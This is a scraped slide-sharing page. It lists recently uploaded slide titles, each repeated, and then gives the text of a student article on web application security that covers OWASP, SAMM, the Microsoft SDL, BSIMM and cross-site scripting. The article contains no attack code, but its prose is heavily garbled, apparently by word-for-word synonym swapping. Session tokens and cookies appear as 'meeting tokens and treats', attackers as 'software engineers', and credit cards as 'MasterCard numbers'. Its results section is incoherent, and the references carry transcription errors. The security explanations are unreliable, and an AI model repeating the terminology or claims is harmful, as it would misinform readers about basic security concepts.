Choosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for ParentsChoosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for Parentsnavabharathschool99
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Celine George
 
Q4 English4 Week3 PPT Melcnmg-based.pptx
Q4 English4 Week3 PPT Melcnmg-based.pptxQ4 English4 Week3 PPT Melcnmg-based.pptx
Q4 English4 Week3 PPT Melcnmg-based.pptxnelietumpap1
 
DATA STRUCTURE AND ALGORITHM for beginners
DATA STRUCTURE AND ALGORITHM for beginnersDATA STRUCTURE AND ALGORITHM for beginners
DATA STRUCTURE AND ALGORITHM for beginnersSabitha Banu
 
Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Mark Reed
 
Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Celine George
 
Gas measurement O2,Co2,& ph) 04/2024.pptx
Gas measurement O2,Co2,& ph) 04/2024.pptxGas measurement O2,Co2,& ph) 04/2024.pptx
Gas measurement O2,Co2,& ph) 04/2024.pptxDr.Ibrahim Hassaan
 
Computed Fields and api Depends in the Odoo 17
Computed Fields and api Depends in the Odoo 17Computed Fields and api Depends in the Odoo 17
Computed Fields and api Depends in the Odoo 17Celine George
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxAnupkumar Sharma
 
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxiammrhaywood
 
Keynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designKeynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designMIPLM
 
How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17Celine George
 
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Celine George
 
Grade 9 Q4-MELC1-Active and Passive Voice.pptx
Grade 9 Q4-MELC1-Active and Passive Voice.pptxGrade 9 Q4-MELC1-Active and Passive Voice.pptx
Grade 9 Q4-MELC1-Active and Passive Voice.pptxChelloAnnAsuncion2
 
ENGLISH6-Q4-W3.pptxqurter our high choom
ENGLISH6-Q4-W3.pptxqurter our high choomENGLISH6-Q4-W3.pptxqurter our high choom
ENGLISH6-Q4-W3.pptxqurter our high choomnelietumpap1
 
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdfLike-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdfMr Bounab Samir
 
Full Stack Web Development Course for Beginners
Full Stack Web Development Course for BeginnersFull Stack Web Development Course for Beginners
Full Stack Web Development Course for BeginnersSabitha Banu
 
Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Jisc
 
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxINTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxHumphrey A Beña
 
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...Nguyen Thanh Tu Collection
 

Recently uploaded (20)

Choosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for ParentsChoosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for Parents
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17
 
Q4 English4 Week3 PPT Melcnmg-based.pptx
Q4 English4 Week3 PPT Melcnmg-based.pptxQ4 English4 Week3 PPT Melcnmg-based.pptx
Q4 English4 Week3 PPT Melcnmg-based.pptx
 
DATA STRUCTURE AND ALGORITHM for beginners
DATA STRUCTURE AND ALGORITHM for beginnersDATA STRUCTURE AND ALGORITHM for beginners
DATA STRUCTURE AND ALGORITHM for beginners
 
Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)
 
Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17
 
Gas measurement O2,Co2,& ph) 04/2024.pptx
Gas measurement O2,Co2,& ph) 04/2024.pptxGas measurement O2,Co2,& ph) 04/2024.pptx
Gas measurement O2,Co2,& ph) 04/2024.pptx
 
Computed Fields and api Depends in the Odoo 17
Computed Fields and api Depends in the Odoo 17Computed Fields and api Depends in the Odoo 17
Computed Fields and api Depends in the Odoo 17
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
 
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
 
Keynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designKeynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-design
 
How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17
 
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
 
Grade 9 Q4-MELC1-Active and Passive Voice.pptx
Grade 9 Q4-MELC1-Active and Passive Voice.pptxGrade 9 Q4-MELC1-Active and Passive Voice.pptx
Grade 9 Q4-MELC1-Active and Passive Voice.pptx
 
ENGLISH6-Q4-W3.pptxqurter our high choom
ENGLISH6-Q4-W3.pptxqurter our high choomENGLISH6-Q4-W3.pptxqurter our high choom
ENGLISH6-Q4-W3.pptxqurter our high choom
 
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdfLike-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
 
Full Stack Web Development Course for Beginners
Full Stack Web Development Course for BeginnersFull Stack Web Development Course for Beginners
Full Stack Web Development Course for Beginners
 
Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...
 
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxINTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
 
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
 

Research Article On Web Application Security

  • 1. Web Application Security Improving Critical Web-based Applications Quality through in-depth Security Analysis SAAD SAIF Department Of Computer Sciences Lahore Garrison University Abstract The Internet, and specifically the World Wide Web, has gotten one of the most well-known correspondence mediums in the World. A huge number of clients associate regularly to various electronic applications to look for data, trade messages, communicate with one another, direct business, cover charges, perform money related activities and some more. A portion of these basic online administrations are focused by a few malignant clients expecting to abuse potential shortcomings and vulnerabilities, which could cause the disturbance of the administration, yet in addition bargain the clients and associations data. A large portion of the occasions, these noxious clients prevail with regards to abusing various kinds of vulnerabilities and the outcomes can be lamentable. Most of these vulnerabilities are legitimately related with the online applications absence of value therefore from an ineffectively executed programming advancement life cycle (SDLC). Keywords:- Web Application, Security, Automated Testing, Quality, Critical INTRODUCTION Security was, still and consistently will be one of the significant worries that basic frameworks have, particularly when sent in the World Wide Web, available through an internet browser. Presently a Days there are a giant proportion of organizations sent in the World Wide Web and individuals depend on this correspondence framework to per-structure regular tasks. Instances of these tasks are: charge installments, banking activities, e-shopping, email, government medicinal services framework activities, etc. Besides, in certain nations, these tasks are really required; one case of this is Portugal, where the open association organizations were totally sent in the Web targeting uniting government and resident. Most security concerns are currently related with the application level. This has one straightforward clarification, web applications are available through programs, and can be gotten to by everybody with
  • 2. Internet. This has the intrinsic chance that great or seriously intentioned individuals can exploit this and perform malignant activities. The quantity of assaults reported by certain elements effectively affirms this. The National Institute of Standards and Technology (NIST) holds a National Vulnerability Database (NVD), which has more than 40000 vulnerabilities, distinguished in the application level as of March 13, 2010.This is moreover confirmed by the Gartner Gathering, which evaluates that 70% of the ambushes to an association's web application begin from the application level. WEB APPLICATIONS AS THE WEAKEST LINK Web applications no longer relates with back workplaces and home amusement. Nowadays, web applications have become the most significant applications throughout everybody's life and relates with most activities clients make in the Internet. Security experts regularly misjudge the genuine issues related with security blemishes these days - programming. Programming is the most fragile connection in security. Application level security relates with numerous issues inside this theme and it can't be limited to acceptable programming rehearses. Confirmation that security issues relate with programming is that, other than the quantity of utilization level vulnerabilities abused in the course of the most recent couple of years is developing, associations like OWASP , WASC, CERT PT, etc are turning into every day progressively dynamic and security experts are beginning to comprehend and accept absolutely their suggestions. Top 10 OWASP and the WASC risk gathering point precisely to the most notable application layer security issues, which get from an enormous experience from security specialists around the world. SECURITY INTEGRATION WITH THE SOLC The unconventionality and market demand in fundamental electronic applications has made an extension in the advancement of security models in the item improvement life cycle. One of the bases for these frameworks is that security must be accessible through every time of the SDLC thusly achieving quality as a last thing. This regularly includes correspondences and collaboration from top seats (CIO, CEO, and others), running down the chain of importance, through task administrators and designers. The purpose of this hierarchical mindfulness is basic, security is a procedure, not a last item, and ought to be managed thusly, incorporating encounters, dreams and worries from everybody. Microsoft Security Development Lifecycle (MS DLe) Microsoft's strategy is perhaps one of the most utilized in the business territory. This is generally determined by the way that their items are available through each market and advances, implementing the utilization of their examples. MS OLC is depicted by Microsoft as being flexible (applies to enormous, medium and little organizations, to different improvement systems and to any stage), savvy (they present an examination by NIST which guarantees that code fixes after the sending can go up to 30 time than if act in the advancement stage) and quantifiable (they present investigations contrasting the quantity of vulnerabilities and without their foundation).Building Security in Maturity Model (BSIMM)
  • 3. OWASP Software Assurance Maturity Model (SAMM) The OWASP SAMM is a structure, which points helping associations to plan a security system for programming security. This system gives all the assets to free and helps in: • Assessing the current practices in the association related with programming security • Building a decent programming security confirmation program for explicit emphases • Exhibiting upgrades to a security confirmation program • Characterizing and estimating security-related exercises all through an association. Literature Review Over the latest couple of years, application-level vulnerabilities have been abused with real outcomes. Software engineers have misdirected online business regions into transportation stock for no charge, usernames and passwords have been harvested, and characterized information, (for instance, areas and MasterCard numbers) has been spilled. Scientists begin to research new instruments and procedures which address the issue of utilization level web security from numerous headings pre, inside, and post. Glisson and Well and in fight that security should be started first before the application progression process direct through a self-governing versatile system that contains customizable security parts. Literature Survey Among the numerous assaults on Web applications, cross-website scripting (XSS) is one of the most widely recognized. A XSS ambush incorporates mixing poisonous substance into a trusted in site that executes on a visitor's program without the visitor's data and in this manner enables the aggressor to get to unstable customer data, for instance, meeting tokens and treats set aside on the program. With this data, attackers can execute a couple of malignant acts, including misrepresentation, key-logging, phishing, customer emulate, and webcam incitation
  • 4. Confusion Matrix Results In All Articles I read that the web applications are more secure and well defined applications which are best as web services which provided us by Google and other search engine. So there is also a lot of work which ion all web applications for their security and other harmful activities which can give harm them. So all experts work, analysis and testing on web applications and try to safe critical information which is not used by the third party. Title Improving Critical Web-based Applications Quality through in-depth Security Analysis Web Application Security Tools Analysis Tool-Based Approach to Assessing Web Application Security Semantic security against web application attacks Privacy Solutions
  • 5. Conclusion Basic web applications quality can't be isolated from security issues. Security must be available in each basic web application as it is a quality measure each client take as allowed. In this paper we centered in the coordination of security rehearses in the SDLC. The SDLC targets stigmatizing examples and principles for creating programming with a better level. The coordination of security inside those models is imperative for these applications, and consequently, security exercises were characterized by each phase of the SDLC, prompting an expansion of web applications quality through the whole improvement process. Web applications are these days the door among individuals and regular activities with the whole world. This must be comprehended, and along these lines, quality norms must be raised, which from our perspective, it can just occur with the expansion of security. References [1] Backtrack (2011). Backtrack Linux - penetration testing distribution website. http://www.backtrack- linux.orgl. (Access date: IS June 2011) [2] Brunel D. Romero M., H. M. H. and A, 1. E. M. (2009). A methodological tool for asset identification in web applications. In IEEE Fourth International Conference on Software Engineering Advances, pages 413--418. IEEE. [3] BSIMM (2011). The building security in maturity model. http://bsimm.coml. (Access date: IS June 2011). [4] CERT.PT (2010). Cert.pt web site. http://www.cert.ptl. Consortium, W. AS. (2010a). (Access date: IS June 2011). [5] WASC Threat Classification version 2.0. WASC. Consortium, W. AS. (2010b). Web application security consortium web site. http://www.webappsec.orgl. (Access date: IS June 2011). [6] Duan, B., Zhang, Y., and Gun D. (2008). An easy-to-deploy penetration testing platform. In Young Computer Sci- enlists, 2008. ICYCS 2008. The 9th International Con- ference for, pages 2314 -2318. [7] Fong, E. and Okun, V. (2007). Web application scanners: Definitions and functions. In System Sciences, 2007. HICSS 2007. 40th Annual Hawaii International Con- ference on, page 280b. [8] Madan, S. and Madan, S. (2010). Security standards per- spective to fortify web database applications from code injection attack. In IEEE International Confer- ence on Intelligent Systems, Modeling and Simulation. IEEE.